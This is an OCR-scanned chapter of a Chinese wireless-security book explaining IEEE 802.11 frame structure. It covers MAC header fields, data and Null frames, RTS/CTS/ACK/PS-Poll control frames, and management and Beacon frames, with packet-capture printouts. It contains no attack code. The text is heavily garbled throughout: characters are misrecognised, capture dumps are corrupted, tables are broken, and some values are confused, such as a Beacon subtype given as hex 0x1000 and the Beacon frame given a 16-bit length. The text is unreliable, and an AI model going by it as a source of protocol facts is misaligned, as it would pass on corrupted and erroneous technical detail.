无 线 网 络 由 于 目 身 的 特性 ， 在 传输 过 
程 中 存在 被 罚 听 的 缺陷 ， 因 此 学 习 IEEE 
802.11 协 议 头 的 组 成 便 是 整个 无 线 网 络 安全 
的 重 中 之 重 。 不 过 ， 在 学 习 IEEE 802.11 协 
议 头 之 前 需要 先 了 解 以 下 几 个 概念 : 
e。 DU (Data Unit) 数据 单元 : 信息 传 
输 的 最 小 数据 集合 。 
© MSDU (MAC Service Data Unit): 
MAC 服 务 数据 单元 。 
© MPDU (MAC Protocol Data Unit): 
MAC 协 议 数 据 单元 。 
e 传递 过 程 逐 层 封装 (Encapsulation): 
数据 在 传输 过 程 中 的 封装 方式 ， 下 
图 为 封装 过 程 。 


Physical Layer PDU 【PPDU) 


下 面 再 来 认识 一 下 802.11 的 数据 结构 ， 
P00 


TT 
从 数据 结构 可 以 看 由， 802.11 MAC 
Header (MAC 头 ) 包括 四 部 分 ， 分 别 是 


Frame Control ( 帧 控制 域 ) 、Duration/ID 
(持续 时 间 / 标 识 ) 、Address (地 址 域 ) 和 
Sequence Control 〈 序 列 控制 域 ) 。 
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1 ) Frame Control ( 帧 控制 域 ) 

Frame Control 〈 帧 控制 域 ) 包含 下 面 几 
个 部 分 : 

(1 ) Protocol Version (协议 版 本 占 2 
位 )。IEEE 802.11 协议 版 本 ， 多 数 情况 为 0。 

(2) Type 类 型 域 ) 和 Subtype〈 子 类 
型 域 ) 共同 指出 帧 的 类 型 。 其 中 ，Type (2 
位 ) 规定 帧 的 具体 用 途 ， 包 括 三 种 类 型 ， 
管理 帧 取 值 为 0， 控 制 帧 取 值 为 1， 数 据 
帧 取 值 为 2。SubType (4 位) 为 子 类 型 ， 
根据 Type 的 不 同 对 应 多 个 子 类 型 ， 协 议 
规定 不 同类 型 、 子 类 型 的 帧 完成 不 同 功 能 
的 操作 。 

(3) To DS (1 位 ) 。 
回 DS 发 送 的 帧 。 

(4) FromDS (1 位 ) 。 
向 BSS 发 送 的 帧 。 

To DS 、From DS 这 两 个 字段 的 值 决 定 
MAC 头 中 的 四 个 地 址 字段 的 不 同 定义 ， 具 
体 如 下 图 所 示 。 
| ToDs | FromDs | Address1 | Address2 | Address3 | Address4 | 


表明 该 帧 是 BSS 


表明 该 帧 是 DS 


DA: Destination Addres 
SA: Sourece Address 


RA: Recipient Address 
TA: Transmitter Address 


详细 介绍 如 下 : 

© BSSID (Basic Service Set Identifer ) : 
基本 服务 集 标 识 符 。 

e DA (Destination Address) : 目的 
地 址 。 

e SA (Sender Address) : 源 地 址 。 

@ RA (Receiver Address) : 接收 端 地 
址 。 

e TA (Transmission Address) : 发 送 
端 地 址 。 

© WDS (Wireless Distribution System ) : 
无 线 分 布 式 系统 。 

四 个 字段 的 取 值 如 下 : 


e 0x00: 出 现在 IBSS 环 境 中 〈 可 能 是 
管理 帧 或 者 是 控制 帧 类 型 ) ; 或 者 
是 STSL (Station to Station Link) 中 


两 个 STA 间 的 通信 ， 这 种 情况 下 通 
信 不 经 过 AP。 

e 0x01: 表示 Data 帧 从 AP 端 发 回 
STA 端 。 

e 0x02: 表示 Data 帧 从 STA 端 发 回 
AP 端 。 

e 0x03: 表示 两 个 AP 间 的 通信 ， 
这 是 典型 的 WDS (Wireless 
Distribution System) 环境 下 AP 间 
的 通信 ， 或 者 表示 Mesh 环 境 下 MP 
间 的 通信 ; 只 有 此 时 才 会 使 用 到 
Address4 地 址 段 。 


侈 注意 : 只 有 单 播 接收 地 址 的 帧 才 会 被 分 
段 ， 广 播 帧 、 组 播 帧 不 适用 该 位 。 


(5) More Frag 〈 占 1 人 位) 。 用 于 说 明 
长 帧 被 分 段 的 情况 ， 是 否 有 后 续 数 据 ， 当 
取 值 为 1 时 表示 有 后 续 数 据 ， 可 能 是 数据 
帧 或 者 管理 帧 类 型 。 

(6) Retry ( 重 传 域 占 1 位 ) 。 是 否 重 传 ， 
取 值 为 1 表示 重 传 数 据 ， 可 能 是 数据 帧 或 
管理 帧 类 型 ， 接 收 问 进程 使 用 此 位 判断 帆 
是 否 重 复 。 

(7) Pwr Mgt〈 能 量 管理 域 占 1 位 ) 。 
省 电 模 式 ， 取 值 为 1 时 表示 STA 处 于 省 电 
模式 ， 此 时 由 STA 向 AP 发 送 该 值 为 1 的 
帧 (AP 不 使 用 该 字段 ) ， 省 电 模 式 下 STA 
不 接收 除 唤醒 帧 之 外 的 帧 数据 ， 发 送 给 它 
的 数据 帧 由 AP 进行 缓存 。 

(8) More Data (更 多 数据 域 占 1 位 ) 。 
如 果 是 值 为 1 表明 至 少 还 有 一 个 数据 帧 要 
发 送 给 STA。 当 AP 缓存 了 至 少 一 个 MSDU 
时 ， 会 向 省 电 模式 的 STA 发 送 该 位 为 1 的 
帧 ， 表 示 有 绥 存 数据 需要 STA 进行 接收 ， 
接收 到 此 帧 的 STA 会 被 唤醒 并 网 AP 发 送 
PS-Poll 帧 ， 取 回 由 AP 代为 存放 的 数据 ; 
该 位 也 被 AP 用 于 有 更 多 的 广播 、 多 播 帧 需 
要 发 送 的 情况 。 

(9) Protected Frame 〈( 占 1 位 ) 。 可 能 
是 数据 帧 或 者 管理 帧 类 型 ， 表 示 MSDU 
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是 否 被 加 密 ; 也 用 于 表示 PSK 身份 验证 
Frame#3 帧 ;数据 载荷 位 为 空 时 ， 该 字段 取 
值 为 0。 

(10) Order〈 序 号 域 占 1 位 ) : 在 非 
QoS 帧 的 情况 下 ， 取 值 为 1 表示 数据 必须 严 
格 按照 顺序 处 理 ， 通 常情 况 下 该 字段 为 0。 

2) DurationID 〈 持 续 时 间 / 标 识 ) 

Duration/ID 〈 持 续 时 间 / 标 识 ) ， 表 
明 该 帧 和 它 的 确认 帧 将 会 占用 信道 多 长 时 
间 ; 对 于 帧 控制 域 子 类 型 为 Power Save-PoII 
的 帧 ， 该 域 表 示 了 STA 的 连接 身份 (AID， 
Association Indentification) 。 

3) Address〈 地 址 域 ) 

Address (地 址 域 ) 包括 源 地 址 

(SA) 、 目 的 地 址 (DA) 、 传 输 工 作 站 
地 址 〈TA) 和 接收 工作 站 地 址 (RA) 。 
SA 与 DA 必 不 可 少 ， 后 两 地 址 只 针对 BSS 的 
通信 才 有 用 ， 而 目的 地 址 可 以 为 单 播 地 址 
(Unicast address) 、 多 播 地 址 (Multicast ad- 
dress) 、 广 播 地 址 (Broadcast address) 等 。 

4) Sequence Control (序列 控制 域 ) 

Sequence Control (序列 控制 域 ): 由 
代表 MSDU (MAC Server Data Unit) 或 者 
MMSDU (MAC Management Server Data 
Unit) 的 12 位 序列 号 〈Sequence Number) 
和 表示 MSDU 和 MMSDU 的 每 一 个 片段 的 编 
号 的 4 位 片段 号 组 成 (Fragment Number) 。 

5) 802.11 的 其 他 数据 结构 

802.11 的 数据 结构 还 存在 有 其 他 部 分 ， 
包括 Frame Body《〈 帧 体 部 分 ) 和 FCS 〈 校 验 
人 码 ) ， 其 中 Frame Body〔 怖 体 部 分 ) ， 包 
含 信 息 根 据 帧 的 类 型 有 所 不 同 ， 主 要 封装 
的 是 上 层 的 数据 单元 ， 长 度 为 0~2312 个 字 
节 ， 可 以 推出 ，802.11 帧 最 大 长 度 为 2346 
个 字 节 。FCS 〈 校 验 码 ) 包含 32 位 完整 性 
校 验 码 。 

针对 帧 的 不 同 功 能 ， 可 将 802.11 中 的 

e 数据 帧 : 用 于 在 竞争 期 和 非 竞 争 期 

传输 数据 。 
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e 控制 帧 : 用 于 竞争 期 间 的 握手 通信 
和 正 回 确认 ， 为 数据 帧 的 发 送 提供 
辅助 功能 。 

e 管理 帧 : 主要 用 于 STA 与 AP 之 间 协 
商 、 关 系 的 控制 ， 如 关联 、 认 证 、 
同步 等 。 


全 提示: Frame Control ( 帧 控制 ) 中 的 Type 


(类 型 ) 和 Subtype 〈 子 类 型 ) 共同 指出 帧 
的 类 型 ， 当 Type 的 B3B2 位 为 00 时 ， 该 帧 为 
管理 帧 ; 为 01 时 ， 该 帧 为 控制 帧 ; 为 10 时 ， 
该 帧 为 数据 帧 。 而 Subtype 进 一 步 判 断 帧 类 


型 ， 如 管理 帧 又 分 为 关联 帧 和 认证 帧 。 


数据 帧 会 将 上 层 协议 的 数据 置 于 帧 主 


和。 雪村 全 将 上 县 协 议 的 所 和 了 


据 帧 所 属 的 类 型 ， 本 节 介 绍 两 种 类 型 的 数 
据 帧 ， 一 种 是 Data 数 据 帧 ， 另 一 种 是 Null 数 
据 帧 。 


1. Data 数 据 帧 


Data 数 据 帧 的 作用 在 于 携带 传输 数 
据 ， 它 的 Data 部 分 便 是 需要 传输 的 具体 数 
据 ， 人 至 于 传输 多 大 的 数据 ， 数 据 使 用 何 种 
方式 进行 加 密 它 并 不 关心 。 

Data 数 据 帧 在 实际 抓 包 软 件 中 的 数据 
信息 ， 如 下 图 所 示 。 


[= TEEE B21 Veta Flags: she hs 
Type/Subtype: Data (QOQx8020) 
~ Frame Control Field: 9x9842 

sade 800 = Version: 9 

.... 190.. = Type: Data frame (2) 

©0000 .... = Subtype: 0 
;+ Flags: OxX42 
.000 8000 0000 609000 = Duration: © microseconds 
Receiver address: Broadcast (ff:ff:ff:ff:ff:ff) 
Transmitter address: Fiberhom_57:88:4c (60:b6:17:57:88:4c) 
Destination address: Broadcast (ff:ff:ff:ff:ff:ff) 
Source address: Skyworth_18:ee:92 (88:cc:45:18:ee:02) 
BSS Id: Fiberhom 57:88:4c (60:;b6:17:57:;88:;4c) 
STA address: Broadcast (ff:ff:ff:ff:ff:ff) 
ee 99696 = Fragment number: 0 


1000 G100 1010 .... 
» TKIP parameters 
~ Data (134 bytes 
Data: 668fa9e3bac621fab97531466885cb45c994097c7cafee6aa . . . 
[Length: 134] 


= Sequence number: 2122 


2. Null 数 据 帧 


Null 数 据 帧 由 MAC 标 头 与 FCS 结 尾 所 组 
成 。 当 工作 站 进入 休眠 状态 ， 接 入 点 必须 开 
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始 为 之 暂 存 数据 。 如 果 该 移动 式 工 作 站 没有 
数据 要 通过 分 布 式 系统 传输 ， 可 以 使 用 Null 
数据 帧 。Null 数 据 帧 的 用 法 ， 如 下 图 所 示 。 


EE pe frame: PM=1 


Frame Er 


ee 


Power 
management=1 


Null 数 据 帧 在 实际 抓 包 软件 中 的 数据 ， 
如 下 图 所 示 。 


~ IEEE 802.11 Null function (No data), Flags: ......F 
Type/Subtype: Nul] function (No data) (6x6924) 
~ Frame Control Field: 60Xx48D2 
人 99 = Version: © 


.... 19.. = Type: Data frame (2) 

9169 .... = Subtype: 4 
» Flags: QAxA2 
.D99 6001 68011 1010 = Duration: 314 microseconds 
Receiver address: HuaweiTe 03:43:ab (74:d2:1d:03:43:ab) 
Transmitter address: 06:88:5e:ga:1b:28 (06:88:5e:0a:1b:28) 
Destination address: HuaweiTe 063:43:ab (74:d2:1d:93:43:ab ) 
Source address: 96:88:5e:ba:lb:28 (96:88:5e:9a:lb:28) 
BSS Id: 06:88:5e:0a:1b:28 (06:88:5e:Da:1b:28) 
STA address: HuaweiTe _ 03:43:ab (74:d2:1d:g3:43:ab) 
和 00060 = Fragment number: © 
O001 O00 0101 .... = Sequence number: 261 


控制 师 


控制 帧 主要 用 于 协助 数据 帧 的 传递 ， 
控制 帧 通常 与 数据 帧 搭配 使 用 ， 可 用 于 管 
理 无 线 媒 介 的 访问 、 提 供 MAC 层 的 可 靠 
性 ， 负 责 区 域 的 清空 、 信 道 的 取得 以 及 载 
波 监听 的 维护 等 ， 并 于 收 到 数据 时 予以 正 
面 的 应 答 ， 借 此 促进 工作 站 间 数 据 传输 的 
可 靠 性 。 

控制 帧 中 的 Frame Control 位 ， 结 构 示 意 
如 下 图 所 示 。 


bits 2 2 4 1 1 1 1 1 1 1 1 
protocol | 'YPe Type 
me wm olelololele ll 


0.2 


由 ToDS © Power Management 
Q@FromDS © More Data 

©® More Fragments © Protected Frame 

© Retry @@ Order 


控制 帧 中 的 Frame Control 位 ， 字 上 段 的 详 
细 说 明 如 下 : 
(1) Protocol (协议 版 本 ) 。 协 议 版 本 


的 值 为 0， 因 为 这 是 目前 绝无仅有 的 版 本 。 

(2) Type《〈 类 型 ) 。 控 制 帧 的 类 型 识别 
码 为 01， 所 有 控制 帧 该 位 都 为 01。 

(3) Subtype( 次 类 型 ) 。 此 位 代表 发 
送 控制 帧 的 子 类 型 。 

(4) ToDS、FromDS。 控 制 帧 负责 处 理 
无 线 介 质 的 访问 ， 因 此 只 能 够 由 无 线 工作 
站 产生 。 传 输 系 统 并 不 会 收发 控制 帧 ， 因 
此 这 两 个 位 为 0。 

(5) More Fragments ( 尚 有 片段 ) 。 控 
制 帧 不 可 能 被 切割 ， 因 此 该 位 为 0。 

(6) Retry 〈 重 试 ) 。 控 制 帧 与 管理 或 
数据 帧 不 同 ， 无 须 在 序列 中 等 等 重 发 ， 因 
此 该 位 为 0。 

(7) Power Management (电源 管理 ) 。 
该 位 用 来 指示 、 完 成 当前 的 帧 交换 过 程 后 ， 
发 送 端的 电源 管理 状态 。 

(8) More Data〈 尚 有 数据 ) 。More Data 
位 只 用 于 管理 数据 帧 ， 因 此 在 控制 帧 中 该 
位 为 0。 

(9) Protected Frame 〈 受 保护 帧 )。 控 
制 帧 不 会 进行 加 密 ， 因 此 对 控制 帧 而 言 ， 
Protected Frame 位 为 0。 

(10) Order〈 光 序 ) 。 控 制 帧 是 基于 
帧 交换 程序 (atomic frame exchange opera- 
tion) 的 构成 部 件 ， 因 此 必须 依 序 发 送 ， 所 
以 这 个 位 为 0。 

Subtype 与 帧 类 型 的 对 应 ， 其 中 Subtype 
字段 使 用 二 进 制 表示 ， 有 具体 介绍 如 下 。 

e 1010: Power Save (PS) - Poll (省 

电 一 轮 询 ) 。 
e 1011: RTS (请 求 发 送 ， 即 : Request 
To Send， 预 约 信 道 ， 帧 长 20 字 节 ) 。 
e 1100: CTS (清除 发 送 ， 即 : Clear To 
Send， 同 意 预 约 ， 帧 长 14 字 节 ) 。 

e 1101: ACK (确认 ) 。 

e 1110: CF-End (无 竞争 周期 结束 〉。 

e 1111: CF-End (无 竞争 周期 结束 ) + 

CEF-ACK 〈 无 竞争 周期 确认 ) 。 
控制 帧 中 常用 的 四 种 类 型 如 下 : 
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(1) RTS 帧 。 用 来 取得 媒介 的 控制 权 ， 
用 于 传送 分 段 帧 ， 分 段 由 网 卡 驱 动 程序 中 
的 RTS threshold 阀 值 确定 。 

(2) CTS 帧 。 用 于 回复 RTS 帧 ， 如 果 
没有 RTS 当然 也 就 没有 CTS， 它 们 两 个 多 
数 是 成 对 出 现 的 。 

(3) ACK 帧 。MAC 及 任何 数据 的 传送 

(包括 一 般 传 送 ,， RTS/CTS 交换 之 前 的 帧 、 
帧 片段 ) 都 需要 通过 ACK 帧 进行 确认 。 

(4) PS-POLL 帧 。 移 动 式 工作 站 从 省 
电 模 式 苏醒 后 ， 会 向 AP 传送 一 个 PS-POLL 
帧 用 于 获得 缓存 数据 。 


6.2.1 RTS (请 求 发 送 ) 


告知 其 他 需要 传输 数据 的 客户 端 等 待 ， 避 


免 信 号 干扰 ， 其 中 数据 传输 的 大 小 划分 是 
由 网 卡 驱动 程式 中 的 RTS threshold( 阔 值 ) 
来 定义 。 介 质 访问 权 只 针对 单 点 传播 (uni- 
cast) 帧 使 用 ， 对 于 广播 (broadcast) 与 组 
播 《multicast) 帧 不 受 影 啊 。 

下 图 为 RTS 帧 的 格式 。 


| MAC Ce 
6 


RTS 的 MAC 标 头 由 四 个 位 构成 : 

(1) Frame Control ( 帧 控制 ) 。Frame 
Control 位 并 没有 任何 特殊 之 处 。 帧 的 sub- 
type〈 子 类 型 ) 位 设 定 为 1011， 代 表 RTS 
帧 。 除 此 之 外 ， 扬 与 其 他 的 控制 帧 具备 相 
同位 。 (在 IEEE 802.11 协议 中 规定 ， 最 高 
有 效 位 乃 是 最 后 一 个 位 ， 因 此 在 subtype 位 
中 ， 第 7 个 位 代表 最 高 效 位 ) 

(2) Duration (持续 时 间 ) 。RTS 帧 会 
试图 预定 传输 介质 使 用 权 ， 供 帧 交换 程序 
使 用 ， 因 此 RTS 帧 发 送 者 必须 计算 RTS 帧 
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结束 后 还 需要 多 少时 间 。 
(3) Address 1 位 。Receiver Address〈 接 
收 端 地址 ) ， 接 收 大 型 帧 的 工作 站 的 地 址 。 
(4) Address 2 位 。Transmitter Address 
(发 送 端 地 址 ) ，RTS 帧 的 发 送 端的 地 址 。 
下 图 为 使 用 抓 包 软件 抓 取 的 实际 RTS 数 
据 包 。 


NOC leaving DS Or nerwork is operatinmy in AD-HOC Wode (To DS: B From ps: 6)} {6x9) 
onents: This i fraDment 
ane is not b snittod 
STA will 
生 Mo data buffered 
tected flag: Da no ted 
dar g: Mot st 
40 = ion:- 
Reeciver ndd Gyuanpd 1d:Sb:d9 ( Sb:09) 
-一 e_7d 


人 6.2.2 CTS (允许 发 送 ) 


er 


CTS 帧 的 格式 如 下 图 所 示 。 


MAC Header 


©@ ToDS © Power Management 
加 FromDS © More Data 

©® More Fragments © Protected Frame 

© Retry 图 Order 


CTS 帧 的 MAC 标 头 由 三 个 位 构成 : 

(1) Frame Control ( 帧 控制 )。 帧 的 
subtype 〈 子 类 型 ) 位 被 设 定 为 1100， 代 表 
CTS 帧 。 


(2) Duration〈 持 续 时 间 ) 。 用 于 应 
答 RTS 时 ，CTS 帧 的 发 送 问 会 以 RITS 帧 的 


Duration 值 作为 持续 时 间 的 计算 基准 。RTS 
会 为 整个 RTS-CTS-frame-ACK 交换 过 程 预 
留 介 质 使 用 时 间 。 不 过 ， 当 CTS 帧 被 发 送 
出 后 ， 只 剩 下 其 他 末 帧 或 帧 片段 及 其 回应 待 
传 。CTS 帧 发 送 端 会 将 RTS 帧 的 Duration 值 
减 去 发 送 CTS 帧 及 其 后 短 帧 间隔 所 需 的 时 间 ， 
然后 将 计算 结果 置 于 CTS 的 Duration 位 。 
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(3) Addressl 位 : Receiver Address 
(接收 端 地 址 ) 。CTS 帧 的 接收 端 即 为 之 
前 RTS 帧 的 发 送 端 ， 因 此 MAC 会 将 RTS 
帧 的 发 送 端 地 址 复制 到 CTS 帧 的 接收 端 地 
址 。802.11g 保护 操作 所 使 用 的 CTS 帧 会 被 
发 送 给 发 出 RTS 的 工作 站 ， 而 且 只 用 来 设 
定 NAV。 
下 图 为 使 用 抓 包 软 件 抓 取 的 实际 CTS 数 


” I ee mesesese 


pre ting in AD-IOC node (To DS: © Fron DS: 69) (Ox0) 


6.2.3 ACK (应 答 ) 


ACK (positive acknowledement)〉 帧 是 
MAC 以 及 任何 数据 传输 都 需要 一 个 应 答 
包括 一 般 传 输 RTS/CTS 交 换 之 前 的 帧 、 帧 片 
段 ， 服 务 质量 扩展 功能 放宽 了 个 别 数据 帧 
必须 各 目 得 到 应 答 的 要 求 。 

下 图 为 ACK 帧 结构 。 


MAC Header 


i 2 4 4 1 1 1 1 1 1 
Type 三 
re Be me lo lololololo lo lo 


©@ToDS © Power Management 
@®@ FromDS ©® More Data 

©® More Fragments ® Protected Frame 

© Retry ©® Order 


ACK 帧 的 MAC 标 头 由 三 个 位 构成 : 

(1) Frame Control ( 帧 控制 ) 。 帧 的 
subtype〈 子 类 型 ) 位 被 设 定 为 1101， 代 表 
ACK 帧 。 

(2) Duration 〈 持 续 时 间 ) 。 根 据 ACK 
信号 在 整个 帧 交换 过 程 处 于 什么 位 置 ， 
Duration 的 值 可 以 有 两 种 设 定 方式 。 在 完整 
的 数据 帧 及 一 段 连续 帧 片段 的 最 后 一 个 片 
段 中 ，Duration 会 被 设 定 为 0。 数 据 及 送 端 
会 将 Frame Control( 帧 控制 ) 位 中 的 More 


Fragments ( 尚 有 片段 ) 位 设 定 为 0， 表 示 
数据 传输 已 经 结束 。 

如 果 More Fragments 位 为 0， 表 示 整 个 
传输 已 经 完成 ， 不 用 再 延长 对 无 线 信道 的 
控制 权 ， 因 此 会 将 Duration 设 定 为 0。 

如 果 More Fragments 位 为 1， 表 示 还 有 
数据 仍 在 发 送 中 。 此 时 Duration 位 的 用 法 和 
CTS 帧 中 的 Duration 位 相同 。 发 送 ACK 以 及 
短 帧 间隔 所 需要 的 时 间 ， 将 由 最 近 帧 片段 
所 记载 的 Duration 中 减 去 。 如 果 不 是 最 后 
一 个 ACK 帧 ，Duration 的 计算 方式 类 似 CTS 
Duration 的 计算 方式 。 事 实 上 ，IEEE 802.11 
协议 中 将 ACK 帧 中 的 Duration 设 定 称 为 虚拟 
ClS。 

(3) Address 1 位 : Receiver Address〔( 接 
收 端 地 址 ) 。 

接收 端 地 址 是 由 所 要 应 答 的 发 送 端 帧 
复制 而 来 。 技 术 上 而 言 ， 它 是 由 所 要 应 答 
帧 的 Address 2 位 复制 而 来 。 应 答 主 要 是 针 
对 数据 帧 、 管 理 帧 以 及 PS-Poll 帧 。 

下 图 为 使 用 抓 包 软 件 抓 取 的 实际 CTS 数 


~ IEEE 862.I Neknowlednement, Flags: .... 
Typre/Subhtype: Acknpwiedgrment {9xga1d)》 
same Cuntroul Field: Bxd166 
-Be xs Version: 9 
-. B1.. = Type: ConLrol frame (1) 
1161 .... = Subtype: 13 
ag5: Bx86 
awee se DS status; Mot leaving DS or neotwork is ol ng AD -HDC ps 
... 0.. = More Frapgnents: This 13 the last frafment 
se 0, = Retry; Frame is not boeing retransmitted 
re .,,, = PWR HGT; STA WILL stay up 
:= Mre Data: Mo dala bufrered 
8,,. ,= Protccted flag: Data is not proteoted 
@... .... = Order flag: Mot strictly ordered 
,998 080 9698 i1169 ~ Duratio 2 microseconds 
Recriver mdress: VivoMahi hd:66:39 (ea:dd:cB:hd:66:39) 
6.2.4 PS-Poll (省 电 模 式 询 
ae es 
Ral O 工 


当 一 部 移动 工作 站 从 省 电 模 式 中 苏 
醒 ， 便 会 发 送 一 个 PS-Poll 帧 给 接 入 点 ， 
以 取得 任何 暂 存 帧 。 下 图 为 PS-Poll 帧 的 


PS-Poll 帧 的 MAC 标 头 由 四 个 位 构成 : 


第 6 章 “” 数据 帧 的 结构 与 加 密 原理 一 一 


(1) Frame Control ( 帧 控制 ) 。 帧 的 
subtype〈 子 类 型 ) 位 被 设 定 为 1010， 代 表 
PS-Poll 帧 。 

(2) AID〈 连 接 识 别 码 ) 。PS-Poll 帧 
将 会 以 MAC 标 头 的 第 三 与 第 四 bit 来 代表 
连接 识别 码 (association ID ) 。 连 接 识别 码 
是 接 入 点 所 指定 的 一 个 数值 ， 用 以 区 别 各 
个 连接 。 将 此 识别 码 置 入 帧 ， 可 让 接 入 点 
找 出 为 其 〈 移 动工 作 站 ) 所 暂 存 的 帧 。 

连接 识别 码 (AID) 在 PS-Poll 帧 中 ， 
DuratiomID 位 是 连接 识别 码 ， 而 非 虚 拟 载 
波 侦 测 功能 所 使 用 的 数值 。 当 移动 工作 站 
与 接 入 点 连接 时 ， 接 入 点 会 从 1-2007 范围 
内 指派 一 个 值 来 做 为 连接 识别 码 (AID) 。 

(3) Address 1 位 : BSSID。 此 位 包含 
发 送 端 当前 所 在 BSS 网 络 中 的 BSSID， 此 
BSS 建立 自 当 前 所 连接 的 AP。 

(4) Address 2 位 。Transmitter Address 

(发 送 端 地 址 ) 。 此 为 PS-Poll 帧 的 发 送 端 
的 MAC 地 址 。 

在 PS-Poll 帧 中 并 未 包含 duration 信 息 ， 
因此 无 法 更 新 NAV。 不 过 ， 所 有 收 到 PS- 
Poll 帧 的 工作 站 ， 都 会 以 短 帧 间 隅 加 上 发 
送 ACK 信 号 所 需要 的 时 间 来 更 新 NAV 。 
此 处 的 自动 调整 机 制 ， 使 得 接 入 点 在 发 
送 ACK 信 号 时 ， 会 避免 与 移动 接 入 点 发 生 
页 撞 。 


6.3 ”管理 帧 


在 IEEE 802.11 协 议 中 存在 有 各 式 各 样 
的 管理 帧 ， 目 的 只 是 对 有 线 网 络 提 供 简单 
的 服务 。 对 有 线 网 络 而 言 ， 识 别 一 部 工作 
站 非常 简单 ， 因 为 它们 服务 端 与 客户 端 必 
须要 有 物理 连接 。 无 线 网 络 则 必须 建立 一 
些 管理 机 制 ， 才 能 实现 类 似 的 功能 。 


6.3.1 管理 帧 的 结构 
无 线 网 络 以 及 处 理 接 入 点 之 间 关 联 的 转 
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二 黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 〈《 超 值 版 ) 


移 事 宜 。802.11 将 整个 管理 过 程 分 解 为 
三 个 步 又 : 

[step 图 寻求 连接 的 移动 工作 站 ， 必 须 找 出 可 
供 访 问 的 无 线 网 络 。 在 有 线 网 络 中 ， 这 个 
步骤 相当 于 找 出 合适 的 网 络 接口 。 

step 图 网 络 系统 必须 对 移动 工作 站 进行 身份 
认证 ， 以 此 为 依据 确定 是 否 让 工作 站 与 网 
络 系统 进行 关联 。 在 有 线 网 络 方面 ， 身 份 
认证 是 由 网 络 系统 本 身 提供 。 如 果 必 须 通 
过 网 线 才 能 够 取得 信号 ， 那 么 获取 网 线 的 
过 程 可 以 理解 为 是 一 种 认证 过 程 。 

移动 工作 站 必须 与 接 入 点 建立 关联 ， 
这 样 才能 访问 有 线 网 络 ， 这 相当 于 将 网 线 
插 到 有 线 网 络 系统 。 

下 图 为 802.11 管 理 帧 的 基本 结构 。 所 有 
管理 帧 的 MAC 标 头 都 一 样 ， 这 与 帧 的 子 类 
型 无 和 关 ， 管 理 帧 会 使 用 信息 元 素 〈 带 有 数字 
标签 的 数据 区 块 ) 来 与 其 他 系统 交换 数据 。 


MAC Header 
2 2 6 6 


0-2312 
-二 一 和 
6 2 4 


©®@ Sequence Control 
@®@ Frame Body 


© Frame Cotrol 
@ Duration 


各 个 字段 详细 说 明 见 下 表 。 
表 802.11 管 理 帧 各 个 字段 的 说 明 


长 度 
描述 与 控制 MAC 帧 相关 
( 帧 控制 ) 信息 


Duration 计算 帧 持续 时 间 的 作用 | 2 
Destination Address | MAC 帧 的 目的 地 址 6 


字 段 名 


Frame Control 


Source Address MAC 帧 的 源 地 址 6 
BSSID 

《基本 服务 集 ID) | 作 站 所 关联 的 接 入 点 的 

MAC 地 址 ) 

Sequence Control “| 用 来 重组 帧 片段 以 及 丢 

(顺序 控制 》 弃 重 复 帧 
Frame Body 

; 信息 a 
( 帧 主体 ) 用 以 传递 上 层 信 =2312 


FCS | ee 
( 帧 校 验 序列 ) 验证 传 来 的 帧 是 否 有 误 |4 
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帧 控制 字段 详细 说 明 见 下 表 。 
表 ” 帧 控制 字段 详细 说 明 


长 度 


Protocol 显示 帧 所 使 用 的 MAC 
(协议 版 本 ) 版 本 

描述 帧 的 类 型 ， 在 管 
Type (类 型 ) 理 帧 中 Type 字段 的 值 | 2 


为 00 


Subtype 〈 子 类 型 ) | 描述 帧 的 子 类 型 4 


与 From DS 位 一 起 指 


To DS 示 帧 的 目的 地 是 否 为 | 1 
分 布 系统 
与 TO DS 位 一 起 指示 
From DS 帧 的 目的 地 是 否 为 分 |1 


布 系统 


显示 该 帧 是 否 还 有 帧 
More FTragments 分 自 1 


Retry 是 否 是 重 传 帧 1 
Power Management | 是否 进 入 省 电 模式 1 


接 入 扣 是 否 有 帧 待 传 
给 休眠 中 的 工作 站 


More Data 

是 否 受到 链 路 层 的 安 
Protected Frame 全 协议 的 保护 
Order 是 否 严格 依次 传送 1 


子 类 型 (Subtype) 与 控制 帧 的 对 应 见 
下 表 。 
表 子 类 型 (Subtype) 与 控制 帧 的 对 应 关系 


子 类 型 控 制 帧 
0000 Association request 〈 连 接 请 求 ) 
0001 Association response (连接 响应 ) 
0010 Reassociation request 〈 重 连接 请 求 ) 
0011 Reassociation Tesponse 〈 重 连接 联 响应 ) 
Probe request (探测 请 求 ) 探测 请 求 
帧 ， 主 要 是 探测 网 络 中 存在 的 AP 
0101 Probe response 〈 探 测 响应 ) 
Beacon〈 信 标 ， 被 动 扫描 时 AP 发 出 ， 
1000 notify) 最 为 复杂 的 一 个 帧 ， 也 是 需 
要 重点 关注 的 一 个 帧 类 型 
1001 AIIM (通知 传输 指示 消息 ) 


续 表 
子 类 型 控 制 帧 
1010 Disassociation〈 解 除 连接 ，notify) 
1011 Authentication (身份 验证 ) 
1100 Deauthentication (解除 认证 ，notify) 
1101 一 1111 | Reserved (保留 ， 未 使 用 ) 


6.3.2” ”Beacon (信和 标 ) 帧 


每 间隔 一 段 时 间 AP 就 会 发 出 一 个 
Beacon〈 信 标 ) 信号 用 来 宣布 802.11 网 络 的 
存在 。Beacon 帧 中 除 包 含 BSS 参 数 信息 外 ， 
还 包含 接 入 点 缓存 帧 的 信息 ， 因 此 移动 式 
工作 站 要 仔细 聆听 Beacon 信 和 号。 

Beacon 帧 长 度 为 16 位 ， 用 来 设 定 Beacon 
信号 之 间 相 隔 多 少时 间 单 位 。 时 间 单 位 通常 
缩写 为 TU， 代 表 1024hs (microsecond) ， 相 
当 于 lms (millisecond) 。Beacon 通 种 会 被 
设 定 为 100 个 时 间 单 位 ， 相 当 于 每 100ms， 
也 就 是 0.1s 传 送 一 次 Beacon 信 号 。 

下 图 为 Beacon 帧 的 结构 。 


al | 


TE] 
-二 EE 二 


长 度 可 变 4 长 度 可 变 3 6 8 长 度 可 变 4 
info Parameter Table constant | announcement report 
re 


PE 1IES 

在 MAC 头 中 的 信息 ， 需 要 关注 以 下 数 
据 信 息 。 

(1) Type。 表 示 管 理 帧 ，Beacon 帧 属 
于 管理 帧 ， 所 以 这 里 值 为 0。 

(2) Subtype。 子 类 型 ， 这 里 值 为 十 六 
进 制 的 0x1000， 也 就 是 十 进 制 的 8， 所 以 
确定 为 Beacon 帧 。 

(3) RA、DA。 均 为 广播 地 址 段 。 

(4) TA、SA。 转 发 地 址 、 源 地 址 是 
AP 地 址 。 

(5) BSS ID。 网 络 中 的 标识 。 


第 6 章 ， 数据 帧 的 结构 与 加 密 原 理 === 


